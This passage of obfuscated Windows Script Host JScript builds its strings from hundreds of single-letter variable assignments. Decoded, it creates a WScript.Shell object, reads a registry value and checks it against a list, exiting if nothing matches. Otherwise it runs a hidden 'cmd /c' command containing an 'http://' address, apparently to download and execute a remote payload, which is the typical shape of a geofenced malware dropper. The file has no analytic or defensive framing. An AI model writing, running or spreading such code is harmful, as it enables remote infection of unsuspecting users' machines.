2 | var ehkjhn = this[mhmseobz + hljhjr + uhnibsbc + tehpnkg + vffiwwhqu + iuaqjhog + zcxgfkzg + wdixpr] ( this[tyvkmuyc + uyxcpua + rktkxz + uhnibsbc + zaxnylv + mhmseobz + wdixpr][tjuic + uhnibsbc + vffiwwhqu + hljhjr + wdixpr + vffiwwhqu + ujfrv + ahfdyoi + jcdwjdzu + vffiwwhqu + rktkxz + wdixpr] ( tyvkmuyc + uyxcpua + rktkxz + uhnibsbc + zaxnylv + mhmseobz + wdixpr + twcirjx + uyxcpua + rdrajex + vffiwwhqu + crxlwk + crxlwk ) [efdbdly + vffiwwhqu + oyjki + efdbdly + vffiwwhqu + hljhjr + pzhmeet] ( cqbltz + yfsmzsx + cywcrat + kyvxjk + ovedlk + tjuic + grdqsvmws + efdbdly + efdbdly + cywcrat + bvcty + dldoqe + ovedlk + grdqsvmws + uyxcpua + cywcrat + efdbdly + muwscsjpt + tjuic + mhogtdrb + zcxgfkzg + wdixpr + uhnibsbc + mhogtdrb + crxlwk + wtzpgphvd + bxdvsek + hljhjr + zcxgfkzg + vffiwwhqu + crxlwk + muwscsjpt + iuaqjhog + zcxgfkzg + wdixpr + vffiwwhqu + uhnibsbc + zcxgfkzg + hljhjr + wdixpr + zaxnylv + mhogtdrb + zcxgfkzg + hljhjr + crxlwk + muwscsjpt + mdupapuo + mhogtdrb + rktkxz + hljhjr + crxlwk + vffiwwhqu ), 16 ); |
|
3 | for ( uwnahcalq = 0 ; uwnahcalq < giznjvsm[crxlwk + vffiwwhqu + zcxgfkzg + oyjki + wdixpr + rdrajex] ; ++ uwnahcalq ) | |
4 | { | |
5 | if ( ehkjhn == giznjvsm[uwnahcalq] ) | |
6 | { | |
7 | ehkjhn = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ehkjhn !== true ) | |
12 | this[tyvkmuyc + uyxcpua + rktkxz + uhnibsbc + zaxnylv + mhmseobz + wdixpr][flxyvglg + ltralsi + zaxnylv + wdixpr] ( ); | |
13 | this[tyvkmuyc + uyxcpua + rktkxz + uhnibsbc + zaxnylv + mhmseobz + wdixpr][tjuic + uhnibsbc + vffiwwhqu + hljhjr + wdixpr + vffiwwhqu + ujfrv + ahfdyoi + jcdwjdzu + vffiwwhqu + rktkxz + wdixpr] ( tyvkmuyc + uyxcpua + rktkxz + uhnibsbc + zaxnylv + mhmseobz + wdixpr + twcirjx + uyxcpua + rdrajex + vffiwwhqu + crxlwk + crxlwk ) [uhnibsbc + ltralsi + zcxgfkzg] ( rktkxz + vnyazyuwe + pzhmeet + wtzpgphvd + zrrpfm + rktkxz + wtzpgphvd + mhmseobz + mhogtdrb + gaquoeax + vffiwwhqu + uhnibsbc + tehpnkg + rdrajex + vffiwwhqu + crxlwk + crxlwk + twcirjx + vffiwwhqu + vkwqmjb + vffiwwhqu + wtzpgphvd + xifbneomf + tjuic + mhogtdrb + vnyazyuwe + vnyazyuwe + hljhjr + zcxgfkzg + pzhmeet + wtzpgphvd + hyoisp + iuaqjhog + zcxgfkzg + xhvbzdn + mhogtdrb + cdiqrxuz + vffiwwhqu + xifbneomf + tyvkmuyc + vffiwwhqu + ahfdyoi + efdbdly + vffiwwhqu + nrzgxluv + ltralsi + vffiwwhqu + tehpnkg + wdixpr + wtzpgphvd + xifbneomf + ujfrv + ltralsi + wdixpr + lpjaapptl + zaxnylv + crxlwk + vffiwwhqu + wtzpgphvd + ezlqovzy + wdixpr + vffiwwhqu + vnyazyuwe + mhmseobz + ezlqovzy + muwscsjpt + zaxnylv + zcxgfkzg + xhvbzdn + mhogtdrb + zaxnylv + rktkxz + vffiwwhqu + twcirjx + mhmseobz + pzhmeet + kfkbklj + wtzpgphvd + rdrajex + wdixpr + wdixpr + mhmseobz + buyesq + zrrpfm + zrrpfm + immawp + dgmus + zepkkij + twcirjx + immawp + jjtdtscyx + zepkkij + twcirjx + immawp + twcirjx + oqeipj + ctaglwxae + psnjv + zrrpfm + zaxnylv + zcxgfkzg + xhvbzdn + mhogtdrb + zaxnylv + rktkxz + vffiwwhqu + twcirjx + mhmseobz + rdrajex + mhmseobz + hyoisp + krmccta + krmccta + tehpnkg + wdixpr + hljhjr + uhnibsbc + wdixpr + wtzpgphvd + ezlqovzy + wdixpr + vffiwwhqu + vnyazyuwe + mhmseobz + ezlqovzy + muwscsjpt + zaxnylv + zcxgfkzg + xhvbzdn + mhogtdrb + zaxnylv + rktkxz + vffiwwhqu + twcirjx + mhmseobz + pzhmeet + kfkbklj + krmccta + krmccta + rktkxz + vnyazyuwe + pzhmeet + wtzpgphvd + zrrpfm + rktkxz + wtzpgphvd + zcxgfkzg + vffiwwhqu + wdixpr + wtzpgphvd + ltralsi + tehpnkg + vffiwwhqu + wtzpgphvd + muwscsjpt + muwscsjpt + immawp + dgmus + zepkkij + twcirjx + immawp + jjtdtscyx + zepkkij + twcirjx + immawp + twcirjx + oqeipj + ctaglwxae + psnjv + knngijm + mwmfv + mwmfv + mwmfv + mwmfv + muwscsjpt + pzhmeet + hljhjr + xhvbzdn + gaquoeax + gaquoeax + gaquoeax + uhnibsbc + mhogtdrb + mhogtdrb + wdixpr + muwscsjpt + krmccta + krmccta + rktkxz + vnyazyuwe + pzhmeet + wtzpgphvd + zrrpfm + rktkxz + wtzpgphvd + uhnibsbc + vffiwwhqu + oyjki + tehpnkg + xhvbzdn + uhnibsbc + zepkkij + oqeipj + wtzpgphvd + zrrpfm + tehpnkg + wtzpgphvd + muwscsjpt + muwscsjpt + immawp + dgmus + zepkkij + twcirjx + immawp + jjtdtscyx + zepkkij + twcirjx + immawp + twcirjx + oqeipj + ctaglwxae + psnjv + knngijm + mwmfv + mwmfv + mwmfv + mwmfv + muwscsjpt + pzhmeet + hljhjr + xhvbzdn + gaquoeax + gaquoeax + gaquoeax + uhnibsbc + mhogtdrb + mhogtdrb + wdixpr + muwscsjpt + zepkkij + iycmpz + iycmpz + iycmpz + hndnozd + immawp + hndnozd + oqeipj + hndnozd + oqeipj + jjtdtscyx + twcirjx + pzhmeet + crxlwk + crxlwk, 0, false ); |
|
14 | } | |
15 | zepkkij = "J"; | |
16 | zepkkij = "g"; | |
17 | zepkkij = "r"; | |
18 | zepkkij = "b"; | |
19 | zepkkij = "T"; | |
20 | zepkkij = "O"; | |
21 | zepkkij = "K"; | |
22 | zepkkij = "F"; | |
23 | zepkkij = "R"; | |
24 | zepkkij = "y"; | |
25 | zepkkij = "E"; | |
26 | zepkkij = "J"; | |
27 | zepkkij = "x"; | |
28 | zepkkij = "q"; | |
29 | zepkkij = "P"; | |
30 | zepkkij = "s"; | |
31 | zepkkij = "u"; | |
32 | zepkkij = "F"; | |
33 | zepkkij = "y"; | |
34 | zepkkij = "k"; | |
35 | zepkkij = "h"; | |
36 | zepkkij = "Y"; | |
37 | zepkkij = "Q"; | |
38 | zepkkij = "e"; | |
39 | zepkkij = "D"; | |
40 | zepkkij = "b"; | |
41 | zepkkij = "c"; | |
42 | zepkkij = "A"; | |
43 | zepkkij = "Q"; | |
44 | zepkkij = "d"; | |
45 | zepkkij = "u"; | |
46 | zepkkij = "e"; | |
47 | zepkkij = "D"; | |
48 | zepkkij = "K"; | |
49 | zepkkij = "O"; | |
50 | zepkkij = "O"; | |
51 | zepkkij = "o"; | |
52 | zepkkij = "z"; | |
53 | zepkkij = "s"; | |
54 | zepkkij = "o"; | |
55 | zepkkij = "E"; | |
56 | zepkkij = "X"; | |
57 | zepkkij = "3"; | |
58 | jjtdtscyx = "I"; | |
59 | jjtdtscyx = "R"; | |
60 | jjtdtscyx = "C"; | |
61 | jjtdtscyx = "s"; | |
62 | jjtdtscyx = "P"; | |
63 | jjtdtscyx = "C"; | |
64 | jjtdtscyx = "K"; | |
65 | jjtdtscyx = "m"; | |
66 | jjtdtscyx = "U"; | |
67 | jjtdtscyx = "u"; | |
68 | jjtdtscyx = "Q"; | |
69 | jjtdtscyx = "Q"; | |
70 | jjtdtscyx = "c"; | |
71 | jjtdtscyx = "C"; | |
72 | jjtdtscyx = "b"; | |
73 | jjtdtscyx = "M"; | |
74 | jjtdtscyx = "t"; | |
75 | jjtdtscyx = "Q"; | |
76 | jjtdtscyx = "r"; | |
77 | jjtdtscyx = "J"; | |
78 | jjtdtscyx = "x"; | |
79 | jjtdtscyx = "E"; | |
80 | jjtdtscyx = "S"; | |
81 | jjtdtscyx = "e"; | |
82 | jjtdtscyx = "f"; | |
83 | jjtdtscyx = "v"; | |
84 | jjtdtscyx = "u"; | |
85 | jjtdtscyx = "y"; | |
86 | jjtdtscyx = "4"; | |
87 | bvcty = "m"; | |
88 | bvcty = "w"; | |
89 | bvcty = "w"; | |
90 | bvcty = "A"; | |
91 | bvcty = "p"; | |
92 | bvcty = "T"; | |
93 | bvcty = "W"; | |
94 | bvcty = "G"; | |
95 | bvcty = "d"; | |
96 | bvcty = "Z"; | |
97 | bvcty = "y"; | |
98 | bvcty = "u"; | |
99 | bvcty = "X"; | |
100 | bvcty = "b"; | |
101 | bvcty = "N"; | |
102 | crxlwk = "q"; | |
103 | crxlwk = "Q"; | |
104 | crxlwk = "B"; | |
105 | crxlwk = "V"; | |
106 | crxlwk = "C"; | |
107 | crxlwk = "V"; | |
108 | crxlwk = "T"; | |
109 | crxlwk = "F"; | |
110 | crxlwk = "U"; | |
111 | crxlwk = "U"; | |
112 | crxlwk = "v"; | |
113 | crxlwk = "q"; | |
114 | crxlwk = "G"; | |
115 | crxlwk = "r"; | |
116 | crxlwk = "e"; | |
117 | crxlwk = "z"; | |
118 | crxlwk = "E"; | |
119 | crxlwk = "s"; | |
120 | crxlwk = "J"; | |
121 | crxlwk = "x"; | |
122 | crxlwk = "a"; | |
123 | crxlwk = "w"; | |
124 | crxlwk = "e"; | |
125 | crxlwk = "x"; | |
126 | crxlwk = "C"; | |
127 | crxlwk = "q"; | |
128 | crxlwk = "Q"; | |
129 | crxlwk = "y"; | |
130 | crxlwk = "c"; | |
131 | crxlwk = "V"; | |
132 | crxlwk = "l"; | |
133 | iycmpz = "J"; | |
134 | iycmpz = "J"; | |
135 | iycmpz = "H"; | |
136 | iycmpz = "h"; | |
137 | iycmpz = "e"; | |
138 | iycmpz = "i"; | |
139 | iycmpz = "E"; | |
140 | iycmpz = "I"; | |
141 | iycmpz = "y"; | |
142 | iycmpz = "6"; | |
143 | buyesq = "S"; | |
144 | buyesq = "C"; | |
145 | buyesq = "m"; | |
146 | buyesq = "e"; | |
147 | buyesq = "u"; | |
148 | buyesq = "Z"; | |
149 | buyesq = "o"; | |
150 | buyesq = "N"; | |
151 | buyesq = "r"; | |
152 | buyesq = "G"; | |
153 | buyesq = "F"; | |
154 | buyesq = "u"; | |
155 | buyesq = "T"; | |
156 | buyesq = "A"; | |
157 | buyesq = "k"; | |
158 | buyesq = "O"; | |
159 | buyesq = "k"; | |
160 | buyesq = "u"; | |
161 | buyesq = "h"; | |
162 | buyesq = "F"; | |
163 | buyesq = ":"; | |
164 | mwmfv = "q"; | |
165 | mwmfv = "T"; | |
166 | mwmfv = "s"; | |
167 | mwmfv = "N"; | |
168 | mwmfv = "u"; | |
169 | mwmfv = "d"; | |
170 | mwmfv = "V"; | |
171 | mwmfv = "S"; | |
172 | mwmfv = "r"; | |
173 | mwmfv = "R"; | |
174 | mwmfv = "m"; | |
175 | mwmfv = "t"; | |
176 | mwmfv = "P"; | |
177 | mwmfv = "U"; | |
178 | mwmfv = "k"; | |
179 | mwmfv = "j"; | |
180 | mwmfv = "h"; | |
181 | mwmfv = "u"; | |
182 | mwmfv = "W"; | |
183 | mwmfv = "w"; | |
184 | mwmfv = "m"; | |
185 | mwmfv = "n"; | |
186 | mwmfv = "s"; | |
187 | mwmfv = "g"; | |
188 | mwmfv = "y"; | |
189 | mwmfv = "J"; | |
190 | mwmfv = "N"; | |
191 | mwmfv = "y"; | |
192 | mwmfv = "m"; | |
193 | mwmfv = "g"; | |
194 | mwmfv = "d"; | |
195 | mwmfv = "q"; | |
196 | mwmfv = "a"; | |
197 | mwmfv = "n"; | |
198 | mwmfv = "c"; | |
199 | mwmfv = "k"; | |
200 | mwmfv = "g"; | |
201 | mwmfv = "V"; | |
202 | mwmfv = "c"; | |
203 | mwmfv = "E"; | |
204 | mwmfv = "u"; | |
205 | mwmfv = "S"; | |
206 | mwmfv = "D"; | |
207 | mwmfv = "8"; | |
208 | hljhjr = "z"; | |
209 | hljhjr = "E"; | |
210 | hljhjr = "I"; | |
211 | hljhjr = "X"; | |
212 | hljhjr = "d"; | |
213 | hljhjr = "h"; | |
214 | hljhjr = "i"; | |
215 | hljhjr = "j"; | |
216 | hljhjr = "a"; | |
217 | immawp = "d"; | |
218 | immawp = "a"; | |
219 | immawp = "r"; | |
220 | immawp = "q"; | |
221 | immawp = "n"; | |
222 | immawp = "g"; | |
223 | immawp = "q"; | |
224 | immawp = "j"; | |
225 | immawp = "j"; | |
226 | immawp = "p"; | |
227 | immawp = "i"; | |
228 | immawp = "I"; | |
229 | immawp = "1"; | |
230 | psnjv = "A"; | |
231 | psnjv = "g"; | |
232 | psnjv = "A"; | |
233 | psnjv = "N"; | |
234 | psnjv = "L"; | |
235 | psnjv = "O"; | |
236 | psnjv = "X"; | |
237 | psnjv = "L"; | |
238 | psnjv = "e"; | |
239 | psnjv = "L"; | |
240 | psnjv = "q"; | |
241 | psnjv = "k"; | |
242 | psnjv = "v"; | |
243 | psnjv = "u"; | |
244 | psnjv = "k"; | |
245 | psnjv = "a"; | |
246 | psnjv = "i"; | |
247 | psnjv = "O"; | |
248 | psnjv = "e"; | |
249 | psnjv = "Q"; | |
250 | psnjv = "j"; | |
251 | psnjv = "i"; | |
252 | psnjv = "D"; | |
253 | psnjv = "s"; | |
254 | psnjv = "t"; | |
255 | psnjv = "s"; | |
256 | psnjv = "5"; | |
257 | cywcrat = "z"; | |
258 | cywcrat = "N"; | |
259 | cywcrat = "P"; | |
260 | cywcrat = "s"; | |
261 | cywcrat = "F"; | |
262 | cywcrat = "r"; | |
263 | cywcrat = "o"; | |
264 | cywcrat = "I"; | |
265 | cywcrat = "w"; | |
266 | cywcrat = "d"; | |
267 | cywcrat = "Y"; | |
268 | cywcrat = "g"; | |
269 | cywcrat = "d"; | |
270 | cywcrat = "a"; | |
271 | cywcrat = "a"; | |
272 | cywcrat = "X"; | |
273 | cywcrat = "S"; | |
274 | cywcrat = "h"; | |
275 | cywcrat = "V"; | |
276 | cywcrat = "Z"; | |
277 | cywcrat = "k"; | |
278 | cywcrat = "e"; | |
279 | cywcrat = "c"; | |
280 | cywcrat = "q"; | |
281 | cywcrat = "N"; | |
282 | cywcrat = "w"; | |
283 | cywcrat = "Z"; | |
284 | cywcrat = "p"; | |
285 | cywcrat = "u"; | |
286 | cywcrat = "P"; | |
287 | cywcrat = "G"; | |
288 | cywcrat = "Y"; | |
289 | cywcrat = "o"; | |
290 | cywcrat = "a"; | |
291 | cywcrat = "N"; | |
292 | cywcrat = "y"; | |
293 | cywcrat = "E"; | |
294 | tehpnkg = "g"; | |
295 | tehpnkg = "I"; | |
296 | tehpnkg = "N"; | |
297 | tehpnkg = "C"; | |
298 | tehpnkg = "s"; | |
299 | ctaglwxae = "E"; | |
300 | ctaglwxae = "s"; | |
301 | ctaglwxae = "m"; | |
302 | ctaglwxae = "W"; | |
303 | ctaglwxae = "H"; | |
304 | ctaglwxae = "w"; | |
305 | ctaglwxae = "t"; | |
306 | ctaglwxae = "j"; | |
307 | ctaglwxae = "P"; | |
308 | ctaglwxae = "f"; | |
309 | ctaglwxae = "g"; | |
310 | ctaglwxae = "f"; | |
311 | ctaglwxae = "s"; | |
312 | ctaglwxae = "l"; | |
313 | ctaglwxae = "S"; | |
314 | ctaglwxae = "Z"; | |
315 | ctaglwxae = "q"; | |
316 | ctaglwxae = "I"; | |
317 | ctaglwxae = "o"; | |
318 | ctaglwxae = "C"; | |
319 | ctaglwxae = "l"; | |
320 | ctaglwxae = "u"; | |
321 | ctaglwxae = "E"; | |
322 | ctaglwxae = "f"; | |
323 | ctaglwxae = "T"; | |
324 | ctaglwxae = "r"; | |
325 | ctaglwxae = "p"; | |
326 | ctaglwxae = "H"; | |
327 | ctaglwxae = "J"; | |
328 | ctaglwxae = "C"; | |
329 | ctaglwxae = "H"; | |
330 | ctaglwxae = "l"; | |
331 | ctaglwxae = "l"; | |
332 | ctaglwxae = "U"; | |
333 | ctaglwxae = "R"; | |
334 | ctaglwxae = "o"; | |
335 | ctaglwxae = "E"; | |
336 | ctaglwxae = "Y"; | |
337 | ctaglwxae = "f"; | |
338 | ctaglwxae = "u"; | |
339 | ctaglwxae = "0"; | |
340 | uyxcpua = "L"; | |
341 | uyxcpua = "v"; | |
342 | uyxcpua = "H"; | |
343 | uyxcpua = "l"; | |
344 | uyxcpua = "Y"; | |
345 | uyxcpua = "I"; | |
346 | uyxcpua = "x"; | |
347 | uyxcpua = "w"; | |
348 | uyxcpua = "J"; | |
349 | uyxcpua = "d"; | |
350 | uyxcpua = "V"; | |
351 | uyxcpua = "X"; | |
352 | uyxcpua = "g"; | |
353 | uyxcpua = "O"; | |
354 | uyxcpua = "V"; | |
355 | uyxcpua = "i"; | |
356 | uyxcpua = "z"; | |
357 | uyxcpua = "J"; | |
358 | uyxcpua = "W"; | |
359 | uyxcpua = "G"; | |
360 | uyxcpua = "c"; | |
361 | uyxcpua = "W"; | |
362 | uyxcpua = "v"; | |
363 | uyxcpua = "x"; | |
364 | uyxcpua = "E"; | |
365 | uyxcpua = "G"; | |
366 | uyxcpua = "H"; | |
367 | uyxcpua = "S"; | |
368 | wtzpgphvd = "J"; | |
369 | wtzpgphvd = "n"; | |
370 | wtzpgphvd = "y"; | |
371 | wtzpgphvd = "z"; | |
372 | wtzpgphvd = "p"; | |
373 | wtzpgphvd = "H"; | |
374 | wtzpgphvd = "w"; | |
375 | wtzpgphvd = "e"; | |
376 | wtzpgphvd = "C"; | |
377 | wtzpgphvd = "g"; | |
378 | wtzpgphvd = "r"; | |
379 | wtzpgphvd = "r"; | |
380 | wtzpgphvd = "A"; | |
381 | wtzpgphvd = "w"; | |
382 | wtzpgphvd = "u"; | |
383 | wtzpgphvd = "q"; | |
384 | wtzpgphvd = "z"; | |
385 | wtzpgphvd = "t"; | |
386 | wtzpgphvd = "E"; | |
387 | wtzpgphvd = "d"; | |
388 | wtzpgphvd = "W"; | |
389 | wtzpgphvd = "R"; | |
390 | wtzpgphvd = "s"; | |
391 | wtzpgphvd = "V"; | |
392 | wtzpgphvd = "f"; | |
393 | wtzpgphvd = "E"; | |
394 | wtzpgphvd = "h"; | |
395 | wtzpgphvd = "P"; | |
396 | wtzpgphvd = "g"; | |
397 | wtzpgphvd = " "; | |
398 | bxdvsek = "c"; | |
399 | bxdvsek = "P"; | |
400 | krmccta = "y"; | |
401 | krmccta = "p"; | |
402 | krmccta = "A"; | |
403 | krmccta = "l"; | |
404 | krmccta = "H"; | |
405 | krmccta = "b"; | |
406 | krmccta = "N"; | |
407 | krmccta = "j"; | |
408 | krmccta = "v"; | |
409 | krmccta = "g"; | |
410 | krmccta = "S"; | |
411 | krmccta = "v"; | |
412 | krmccta = "&"; | |
413 | hyoisp = "H"; | |
414 | hyoisp = "N"; | |
415 | hyoisp = "h"; | |
416 | hyoisp = "g"; | |
417 | hyoisp = "r"; | |
418 | hyoisp = "V"; | |
419 | hyoisp = "F"; | |
420 | hyoisp = "K"; | |
421 | hyoisp = "D"; | |
422 | hyoisp = "c"; | |
423 | hyoisp = "\""; | |
424 | pzhmeet = "B"; | |
425 | pzhmeet = "Z"; | |
426 | pzhmeet = "f"; | |
427 | pzhmeet = "m"; | |
428 | pzhmeet = "f"; | |
429 | pzhmeet = "W"; | |
430 | pzhmeet = "y"; | |
431 | pzhmeet = "e"; | |
432 | pzhmeet = "k"; | |
433 | pzhmeet = "y"; | |
434 | pzhmeet = "O"; | |
435 | pzhmeet = "w"; | |
436 | pzhmeet = "Y"; | |
437 | pzhmeet = "m"; | |
438 | pzhmeet = "Q"; | |
439 | pzhmeet = "N"; | |
440 | pzhmeet = "m"; | |
441 | pzhmeet = "x"; | |
442 | pzhmeet = "m"; | |
443 | pzhmeet = "H"; | |
444 | pzhmeet = "y"; | |
445 | pzhmeet = "G"; | |
446 | pzhmeet = "j"; | |
447 | pzhmeet = "j"; | |
448 | pzhmeet = "U"; | |
449 | pzhmeet = "N"; | |
450 | pzhmeet = "Y"; | |
451 | pzhmeet = "l"; | |
452 | pzhmeet = "Q"; | |
453 | pzhmeet = "A"; | |
454 | pzhmeet = "j"; | |
455 | pzhmeet = "v"; | |
456 | pzhmeet = "u"; | |
457 | pzhmeet = "U"; | |
458 | pzhmeet = "d"; | |
459 | pzhmeet = "I"; | |
460 | pzhmeet = "l"; | |
461 | pzhmeet = "f"; | |
462 | pzhmeet = "z"; | |
463 | pzhmeet = "M"; | |
464 | pzhmeet = "g"; | |
465 | pzhmeet = "i"; | |
466 | pzhmeet = "d"; | |
467 | zcxgfkzg = "i"; | |
468 | zcxgfkzg = "a"; | |
469 | zcxgfkzg = "J"; | |
470 | zcxgfkzg = "X"; | |
471 | zcxgfkzg = "t"; | |
472 | zcxgfkzg = "w"; | |
473 | zcxgfkzg = "D"; | |
474 | zcxgfkzg = "C"; | |
475 | zcxgfkzg = "p"; | |
476 | zcxgfkzg = "l"; | |
477 | zcxgfkzg = "s"; | |
478 | zcxgfkzg = "o"; | |
479 | zcxgfkzg = "f"; | |
480 | zcxgfkzg = "h"; | |
481 | zcxgfkzg = "c"; | |
482 | zcxgfkzg = "z"; | |
483 | zcxgfkzg = "m"; | |
484 | zcxgfkzg = "z"; | |
485 | zcxgfkzg = "P"; | |
486 | zcxgfkzg = "D"; | |
487 | zcxgfkzg = "c"; | |
488 | zcxgfkzg = "b"; | |
489 | zcxgfkzg = "Y"; | |
490 | zcxgfkzg = "r"; | |
491 | zcxgfkzg = "s"; | |
492 | zcxgfkzg = "i"; | |
493 | zcxgfkzg = "i"; | |
494 | zcxgfkzg = "K"; | |
495 | zcxgfkzg = "c"; | |
496 | zcxgfkzg = "a"; | |
497 | zcxgfkzg = "U"; | |
498 | zcxgfkzg = "Q"; | |
499 | zcxgfkzg = "r"; | |
500 | zcxgfkzg = "i"; | |
501 | zcxgfkzg = "Y"; | |
502 | zcxgfkzg = "z"; | |
503 | zcxgfkzg = "v"; | |
504 | zcxgfkzg = "P"; | |
505 | zcxgfkzg = "H"; | |
506 | zcxgfkzg = "n"; | |
507 | grdqsvmws = "v"; | |
508 | grdqsvmws = "O"; | |
509 | grdqsvmws = "H"; | |
510 | grdqsvmws = "e"; | |
511 | grdqsvmws = "u"; | |
512 | grdqsvmws = "o"; | |
513 | grdqsvmws = "A"; | |
514 | grdqsvmws = "m"; | |
515 | grdqsvmws = "B"; | |
516 | grdqsvmws = "n"; | |
517 | grdqsvmws = "S"; | |
518 | grdqsvmws = "z"; | |
519 | grdqsvmws = "r"; | |
520 | grdqsvmws = "j"; | |
521 | grdqsvmws = "B"; | |
522 | grdqsvmws = "f"; | |
523 | grdqsvmws = "Y"; | |
524 | grdqsvmws = "c"; | |
525 | grdqsvmws = "m"; | |
526 | grdqsvmws = "f"; | |
527 | grdqsvmws = "p"; | |
528 | grdqsvmws = "V"; | |
529 | grdqsvmws = "T"; | |
530 | grdqsvmws = "s"; | |
531 | grdqsvmws = "S"; | |
532 | grdqsvmws = "b"; | |
533 | grdqsvmws = "e"; | |
534 | grdqsvmws = "w"; | |
535 | grdqsvmws = "y"; | |
536 | grdqsvmws = "M"; | |
537 | grdqsvmws = "A"; | |
538 | grdqsvmws = "Q"; | |
539 | grdqsvmws = "U"; | |
540 | grdqsvmws = "R"; | |
541 | grdqsvmws = "w"; | |
542 | grdqsvmws = "K"; | |
543 | grdqsvmws = "R"; | |
544 | grdqsvmws = "u"; | |
545 | grdqsvmws = "D"; | |
546 | grdqsvmws = "U"; | |
547 | vffiwwhqu = "t"; | |
548 | vffiwwhqu = "e"; | |
549 | vffiwwhqu = "I"; | |
550 | vffiwwhqu = "A"; | |
551 | vffiwwhqu = "z"; | |
552 | vffiwwhqu = "L"; | |
553 | vffiwwhqu = "e"; | |
554 | ujfrv = "J"; | |
555 | ujfrv = "B"; | |
556 | ujfrv = "n"; | |
557 | ujfrv = "G"; | |
558 | ujfrv = "V"; | |
559 | ujfrv = "y"; | |
560 | ujfrv = "d"; | |
561 | ujfrv = "p"; | |
562 | ujfrv = "r"; | |
563 | ujfrv = "c"; | |
564 | ujfrv = "F"; | |
565 | ujfrv = "d"; | |
566 | ujfrv = "S"; | |
567 | ujfrv = "Q"; | |
568 | ujfrv = "p"; | |
569 | ujfrv = "m"; | |
570 | ujfrv = "F"; | |
571 | ujfrv = "F"; | |
572 | ujfrv = "r"; | |
573 | ujfrv = "O"; | |
574 | ujfrv = "q"; | |
575 | ujfrv = "J"; | |
576 | ujfrv = "Y"; | |
577 | ujfrv = "T"; | |
578 | ujfrv = "O"; | |
579 | gaquoeax = "R"; | |
580 | gaquoeax = "N"; | |
581 | gaquoeax = "b"; | |
582 | gaquoeax = "T"; | |
583 | gaquoeax = "y"; | |
584 | gaquoeax = "S"; | |
585 | gaquoeax = "h"; | |
586 | gaquoeax = "K"; | |
587 | gaquoeax = "Y"; | |
588 | gaquoeax = "a"; | |
589 | gaquoeax = "a"; | |
590 | gaquoeax = "N"; | |
591 | gaquoeax = "Y"; | |
592 | gaquoeax = "D"; | |
593 | gaquoeax = "E"; | |
594 | gaquoeax = "f"; | |
595 | gaquoeax = "o"; | |
596 | gaquoeax = "V"; | |
597 | gaquoeax = "z"; | |
598 | gaquoeax = "k"; | |
599 | gaquoeax = "B"; | |
600 | gaquoeax = "G"; | |
601 | gaquoeax = "c"; | |
602 | gaquoeax = "n"; | |
603 | gaquoeax = "O"; | |
604 | gaquoeax = "s"; | |
605 | gaquoeax = "w"; | |
606 | tyvkmuyc = "r"; | |
607 | tyvkmuyc = "O"; | |
608 | tyvkmuyc = "r"; | |
609 | tyvkmuyc = "c"; | |
610 | tyvkmuyc = "k"; | |
611 | tyvkmuyc = "w"; | |
612 | tyvkmuyc = "n"; | |
613 | tyvkmuyc = "e"; | |
614 | tyvkmuyc = "C"; | |
615 | tyvkmuyc = "M"; | |
616 | tyvkmuyc = "T"; | |
617 | tyvkmuyc = "I"; | |
618 | tyvkmuyc = "k"; | |
619 | tyvkmuyc = "o"; | |
620 | tyvkmuyc = "A"; | |
621 | tyvkmuyc = "Q"; | |
622 | tyvkmuyc = "A"; | |
623 | tyvkmuyc = "N"; | |
624 | tyvkmuyc = "e"; | |
625 | tyvkmuyc = "j"; | |
626 | tyvkmuyc = "U"; | |
627 | tyvkmuyc = "L"; | |
628 | tyvkmuyc = "D"; | |
629 | tyvkmuyc = "W"; | |
630 | zaxnylv = "t"; | |
631 | zaxnylv = "H"; | |
632 | zaxnylv = "U"; | |
633 | zaxnylv = "O"; | |
634 | zaxnylv = "g"; | |
635 | zaxnylv = "g"; | |
636 | zaxnylv = "E"; | |
637 | zaxnylv = "v"; | |
638 | zaxnylv = "Z"; | |
639 | zaxnylv = "T"; | |
640 | zaxnylv = "P"; | |
641 | zaxnylv = "M"; | |
642 | zaxnylv = "n"; | |
643 | zaxnylv = "J"; | |
644 | zaxnylv = "n"; | |
645 | zaxnylv = "k"; | |
646 | zaxnylv = "L"; | |
647 | zaxnylv = "M"; | |
648 | zaxnylv = "w"; | |
649 | zaxnylv = "A"; | |
650 | zaxnylv = "s"; | |
651 | zaxnylv = "X"; | |
652 | zaxnylv = "D"; | |
653 | zaxnylv = "P"; | |
654 | zaxnylv = "g"; | |
655 | zaxnylv = "z"; | |
656 | zaxnylv = "e"; | |
657 | zaxnylv = "S"; | |
658 | zaxnylv = "O"; | |
659 | zaxnylv = "H"; | |
660 | zaxnylv = "w"; | |
661 | zaxnylv = "e"; | |
662 | zaxnylv = "i"; | |
663 | oyjki = "O"; | |
664 | oyjki = "O"; | |
665 | oyjki = "e"; | |
666 | oyjki = "P"; | |
667 | oyjki = "Z"; | |
668 | oyjki = "Y"; | |
669 | oyjki = "e"; | |
670 | oyjki = "i"; | |
671 | oyjki = "Z"; | |
672 | oyjki = "t"; | |
673 | oyjki = "r"; | |
674 | oyjki = "w"; | |
675 | oyjki = "n"; | |
676 | oyjki = "g"; | |
677 | uhnibsbc = "T"; | |
678 | uhnibsbc = "l"; | |
679 | uhnibsbc = "J"; | |
680 | uhnibsbc = "j"; | |
681 | uhnibsbc = "K"; | |
682 | uhnibsbc = "l"; | |
683 | uhnibsbc = "K"; | |
684 | uhnibsbc = "g"; | |
685 | uhnibsbc = "J"; | |
686 | uhnibsbc = "e"; | |
687 | uhnibsbc = "i"; | |
688 | uhnibsbc = "r"; | |
689 | dldoqe = "X"; | |
690 | dldoqe = "I"; | |
691 | dldoqe = "d"; | |
692 | dldoqe = "W"; | |
693 | dldoqe = "R"; | |
694 | dldoqe = "u"; | |
695 | dldoqe = "R"; | |
696 | dldoqe = "p"; | |
697 | dldoqe = "T"; | |
698 | dldoqe = "V"; | |
699 | dldoqe = "L"; | |
700 | dldoqe = "a"; | |
701 | dldoqe = "c"; | |
702 | dldoqe = "p"; | |
703 | dldoqe = "z"; | |
704 | dldoqe = "J"; | |
705 | dldoqe = "P"; | |
706 | dldoqe = "o"; | |
707 | dldoqe = "n"; | |
708 | dldoqe = "W"; | |
709 | dldoqe = "h"; | |
710 | dldoqe = "S"; | |
711 | dldoqe = "I"; | |
712 | dldoqe = "E"; | |
713 | dldoqe = "g"; | |
714 | dldoqe = "v"; | |
715 | dldoqe = "F"; | |
716 | dldoqe = "F"; | |
717 | dldoqe = "x"; | |
718 | dldoqe = "e"; | |
719 | dldoqe = "i"; | |
